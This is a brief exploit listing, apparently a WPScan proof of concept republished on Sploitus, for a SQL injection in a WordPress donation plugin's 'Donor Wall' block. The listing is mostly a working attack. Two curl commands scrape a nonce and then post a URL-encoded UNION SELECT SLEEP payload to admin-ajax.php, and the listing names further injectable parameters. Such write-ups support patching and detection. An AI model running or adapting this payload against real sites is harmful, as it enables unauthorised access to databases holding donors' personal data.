Share 
## https://sploitus.com/exploit?id=WPEX-ID:D8DA539D-0A1B-46EF-B48D-710C59CF68E1
1) Create a post/page that contains the "Donor Wall" block.

2) Using the default donation form, send a test donation

3) In a terminal, edit and run the following command, and copy the nonce it gives you
   curl -s --url 'http://vulnerable-site.tld/donor-wall-post-we-created-earlier/' | grep -o 'data-nonce="[a-f0-9]*"'

4) Still in the terminal, edit and run the following command:
   curl 'http://vulnerable-site.tld/wp-admin/admin-ajax.php' -X POST --data-raw 'action=give_get_donor_comments&nonce=c734a76f44&data=form_id%3D%27%29%20UNION%20%28SELECT%20SLEEP%285%29%29%23'

Other affected parameters: ids (fixed in 2.24.0), donors_per_page (fixed in 2.24.1)